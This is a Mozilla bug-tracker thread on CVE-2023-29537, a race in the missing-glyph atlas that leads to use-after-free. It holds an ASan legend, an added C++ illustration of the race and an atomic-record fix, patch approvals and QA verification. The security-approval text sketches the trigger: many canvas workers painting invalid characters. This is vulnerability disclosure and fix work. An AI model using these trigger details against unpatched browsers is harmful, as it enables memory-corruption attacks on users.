  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
==18340==ABORTING
Group: core-security → gfx-core-security
Flags: sec-bounty?

Jonathan, ideas about how to make this thread-safe? Could we conceivably just disable missing glyphs on worker threads and side-step the issue?

Severity: -- → S3
Flags: needinfo?(jfkthame)

(In reply to Lee Salzman [:lsalzman] from comment #2)

Jonathan, ideas about how to make this thread-safe? Could we conceivably just disable missing glyphs on worker threads and side-step the issue?

I guess that'd be possible, though it seems generally bad for us to handle text rendering differently depending whether we're on a worker or the main thread.

Another option may be to consolidate the glyph-atlas globals into a single record, so we just have one global pointer to manage, and then ensure that whatever thread needs to use it can atomically take ownership of that record for the duration of its operation.

I've started to put together a patch to do the latter; let's see if it seems to work without too much pain.

Flags: needinfo?(jfkthame)
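An added illustration, not code from the bug's patch or from Gecko, of the two things discussed above: the lazy-initialization race on gGlyphMask described in comment 0, replayed deterministically, and one way to implement the single-record, atomically-owned atlas sketched in the comment just above. std::shared_ptr stands in for RefPtr and std::atomic for mozilla::Atomic; the names GlyphAtlasRecord, AcquireGlyphAtlas and ReleaseGlyphAtlas are this example's own and are not claimed to match the landed patch.

```cpp
// Added illustration (not Gecko code): the gGlyphMask lazy-init race from
// comment 0, and an atomic single-record ownership scheme like the one
// comment 3 proposes. std::shared_ptr stands in for RefPtr and std::atomic
// for mozilla::Atomic; all names below are this example's own assumptions.
#include <atomic>
#include <cstdio>
#include <memory>
#include <thread>
#include <vector>

struct SourceSurface { int id; };   // stand-in for SourceSurfaceSkia

// --- Racy pattern: one static RefPtr, checked and assigned without a lock.
static std::shared_ptr<SourceSurface> gGlyphMask;

// Replays the two-thread interleaving from comment 0 on a single thread so the
// outcome is deterministic. Returns true when the surface thread A created was
// destroyed while A still holds a raw pointer to it, i.e. the setup for the
// heap-use-after-free ASan later reports in GetSkImageForSurface.
bool racy_interleaving_frees_first_surface() {
  gGlyphMask.reset();
  bool a_sees_null = !gGlyphMask;                      // A: if (!gGlyphMask)
  bool b_sees_null = !gGlyphMask;                      // B: same check, still null
  gGlyphMask = std::make_shared<SourceSurface>(SourceSurface{1});   // A assigns
  SourceSurface* a_raw = gGlyphMask.get();             // A proceeds to use it
  std::weak_ptr<SourceSurface> a_watch = gGlyphMask;   // observer for surface #1
  if (b_sees_null) {
    // B assigns too: operator= drops the last reference to surface #1.
    gGlyphMask = std::make_shared<SourceSurface>(SourceSurface{2});
  }
  // A would now dereference a_raw; here we only report that it dangles.
  return a_sees_null && b_sees_null && a_raw != nullptr && a_watch.expired();
}

// --- Safer shape: every piece of atlas state lives in one record, and one
// atomic slot hands exclusive ownership of that record to the drawing thread.
struct GlyphAtlasRecord {
  std::shared_ptr<SourceSurface> mask;
  int cachedColor = 0;                 // stands in for the other atlas globals
  std::atomic<bool> inUse{false};      // instrumentation only, to detect sharing
};

static std::atomic<GlyphAtlasRecord*> gGlyphAtlas{nullptr};
static std::atomic<int> gRecordsCreated{0};

// Take the record out of the slot. A thread that finds the slot empty builds a
// private record instead of touching one another thread is using.
GlyphAtlasRecord* AcquireGlyphAtlas() {
  GlyphAtlasRecord* rec = gGlyphAtlas.exchange(nullptr, std::memory_order_acq_rel);
  if (!rec) {
    rec = new GlyphAtlasRecord();
    rec->mask = std::make_shared<SourceSurface>(
        SourceSurface{gRecordsCreated.fetch_add(1) + 1});
  }
  return rec;
}

// Hand the record back. If another thread refilled the slot meanwhile, ours is
// deleted; nobody else can hold a pointer into it because ownership was exclusive.
void ReleaseGlyphAtlas(GlyphAtlasRecord* rec) {
  GlyphAtlasRecord* expected = nullptr;
  if (!gGlyphAtlas.compare_exchange_strong(expected, rec, std::memory_order_acq_rel)) {
    delete rec;
  }
}

// Hammers the atlas from several threads the way many canvas workers would.
// Returns how many times a record was seen in use by two threads at once or
// carried an invalid mask (expected 0 in both cases).
int run_safe_concurrent(int threads, int iters) {
  std::atomic<int> violations{0};
  std::vector<std::thread> pool;
  for (int t = 0; t < threads; ++t) {
    pool.emplace_back([&violations, iters] {
      for (int i = 0; i < iters; ++i) {
        GlyphAtlasRecord* rec = AcquireGlyphAtlas();
        if (rec->inUse.exchange(true)) violations.fetch_add(1);
        if (!rec->mask || rec->mask->id < 1) violations.fetch_add(1);
        rec->cachedColor = i;          // "draw" with the record we own
        rec->inUse.store(false);
        ReleaseGlyphAtlas(rec);
      }
    });
  }
  for (auto& th : pool) th.join();
  delete gGlyphAtlas.exchange(nullptr);   // drop whatever was left in the slot
  return violations.load();
}

int records_created() { return gRecordsCreated.load(); }

int main() {
  std::printf("racy interleaving frees first surface: %s\n",
              racy_interleaving_frees_first_surface() ? "yes" : "no");
  std::printf("violations with atomic record ownership: %d (records created: %d)\n",
              run_safe_concurrent(8, 5000), records_created());
  return 0;
}
```

Build with a C++11 or later compiler and link with pthreads (for example g++ -std=c++17 -pthread). The deterministic replay shows the lifetime problem without dereferencing freed memory; the concurrent loop shows that exchange/compare-exchange on one pointer gives each thread exclusive use of a whole record, so no thread can release a surface another thread is still drawing with. The cost is that two threads arriving at once each build their own record and one copy is discarded afterwards, which is acceptable for a small mask.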

How consistent is the test case at reproducing the issue? Generally I would guess that once-per-process races on a single assignment are hard to trigger, but maybe it is so easy to create two DOM workers at the same time that it is easy to hit.

Flags: needinfo?(loobenyang)

(In reply to Andrew McCreight [:mccr8] from comment #4)

How consistent is the test case at reproducing the issue? Generally I would guess that once-per-process races on a single assignment are hard to trigger, but maybe it is so easy to create two DOM workers at the same time that it is easy to hit.

With this PoC on my Windows PC, it's reproduced almost instantly when I run it. If it does not hit, I only need to try one or a couple more times.

Flags: needinfo?(loobenyang)
Keywords: sec-high, testcase
Attached file tsan.txt
OS: Windows → All
Hardware: Desktop → All

Tyson was able to reproduce it about half of the time, and also reproduce it on Linux. It is interesting to know that a once-per-process race can be triggered so easily sometimes. I suppose the time of the race in this case is very controllable from content. I'll have to keep that in mind in the future.

Summary: GFX - Use After Free in MakeGlyphAtlas() → initialization race leading to use after free in MakeGlyphAtlas()
Component: Graphics: Canvas2D → Graphics: Text

Tyson, would you be able to try the above patch and let me know if this prevents the issue? I haven't reproduced it locally but if I'm understanding it right, I think this should resolve things. Thanks!

Flags: needinfo?(twsmith)
Assignee: nobody → jfkthame
Status: NEW → ASSIGNED

I am still able to reproduce the issue with the patch applied.

Flags: needinfo?(twsmith) → needinfo?(jfkthame)

(In reply to Tyson Smith [:tsmith] from comment #10)

I am still able to reproduce the issue with the patch applied.

Ah, drat. OK, thanks for testing - I'll take another look tomorrow.

Flags: needinfo?(jfkthame)

Oh, wait - looking at your tsan traces, that's a different race than the missing-glyph atlas issue originally reported here. Needs a deeper look.....

Comment on attachment 9324559 [details]
Bug 1823365 - Clean up management of missing-glyph atlas.

Security Approval Request

  • How easily could an exploit be constructed based on the patch?: The patch introduces an atomic, which implies we're concerned about a race/threading issue; and it's in the missing-glyph code, which points to rendering text that contains invalid Unicode values. So it's not a big stretch to get from there to running multiple canvas workers that paint "garbage" characters.

It's unclear to me how one would get beyond a UAF-caused crash (or maybe scrambled rendering) to something actually exploitable, but maybe people more experienced in such things would find a way.

  • Do comments in the patch, the check-in comment, or tests included in the patch paint a bulls-eye on the security problem?: No
  • Which older supported branches are affected by this flaw?: 105 onwards
  • If not all supported branches, which bug introduced the flaw?: None
  • Do you have backports for the affected branches?: No
  • If not, how different, hard to create, and risky will they be?: Should transplant cleanly AFAICS.
  • How likely is this patch to cause regressions; how much testing does it need?: Low risk, fairly simple refactoring to avoid use of several global variables.
  • Is Android affected?: No
Attachment #9324559 - Flags: sec-approval?

The severity field for this bug is set to S3. However, the bug is flagged with the sec-high keyword.
:jfkthame, could you consider increasing the severity of this security bug?

For more information, please visit auto_nag documentation.

Flags: needinfo?(jfkthame)

For what it is worth, I looked on crash stats and I didn't see any use-after-free crashes that looked similar.

Blocks: 1824200

FTR, I filed bug 1824200 for the data race shown in comments 6 and 11, which is unrelated to the original glyph-atlas issue.

Flags: needinfo?(jfkthame)

The bug is marked as tracked for firefox112 (beta) and tracked for firefox113 (nightly). However, the bug still has low severity.

:bhood, could you please increase the severity for this tracked bug? If you disagree with the tracking decision, please talk with the release managers.

For more information, please visit auto_nag documentation.

Flags: needinfo?(bhood)

Comment on attachment 9324559 [details]
Bug 1823365 - Clean up management of missing-glyph atlas.

Approved to land and uplift.

Attachment #9324559 - Flags: sec-approval? → sec-approval+
Flags: needinfo?(bhood)
Group: gfx-core-security → core-security-release
Status: ASSIGNED → RESOLVED
Closed: 11 months ago
Resolution: --- → FIXED
Target Milestone: --- → 113 Branch

Comment on attachment 9324996 [details]
Bug 1823365 - Clean up management of missing-glyph atlas.

Beta/Release Uplift Approval Request

  • User impact if declined: Potential race/use-after-free/crash when rendering missing-glyph symbols
  • Is this code covered by automated tests?: No
  • Has the fix been verified in Nightly?: Yes
  • Needs manual test from QE?: Yes
  • If yes, steps to reproduce: Repeatedly load the testcase in the bug
  • List of other uplifts needed: None
  • Risk to taking this patch: Low
  • Why is the change risky/not risky? (and alternatives if risky): Just replaces several (racy) globals with an atomically-managed record
  • String changes made/needed: none
  • Is Android affected?: No
Attachment #9324996 - Flags: approval-mozilla-beta?
Flags: qe-verify+

Comment on attachment 9324996 [details]
Bug 1823365 - Clean up management of missing-glyph atlas.

Approved for 112.0b8

Attachment #9324996 - Flags: approval-mozilla-beta? → approval-mozilla-beta+
QA Whiteboard: [qa-triaged]

I'm not able to reproduce this crash using the test case from comment 0, with an affected Nightly asan build (2023-03-20). I've tested on Windows 10 and Ubuntu 18.04 x64.

Looben Yang, could you please help us verify whether the bug is fixed on latest Nightly 113 and Beta 112.0b8?

Flags: needinfo?(lsalzman)

FWIW, I found the original testcase crashed pretty reliably for me on macOS with a normal release build. (But as it's a race condition, it may be unpredictable.)

Flags: needinfo?(lsalzman)

Thanks, Jonathan! It crashed for me as well immediately on macOS 11 with a regular FF 111.0.1 build.

The crash is not reproducing anymore on latest Nightly 113.0a1 and Beta 112.0b9, under macOS 11.

Status: RESOLVED → VERIFIED
Flags: qe-verify+
Flags: sec-bounty? → sec-bounty+
Whiteboard: [adv-main112+]
Attached file advisory.txt
Alias: CVE-2023-29537
Group: core-security-release
Regressions: 1874324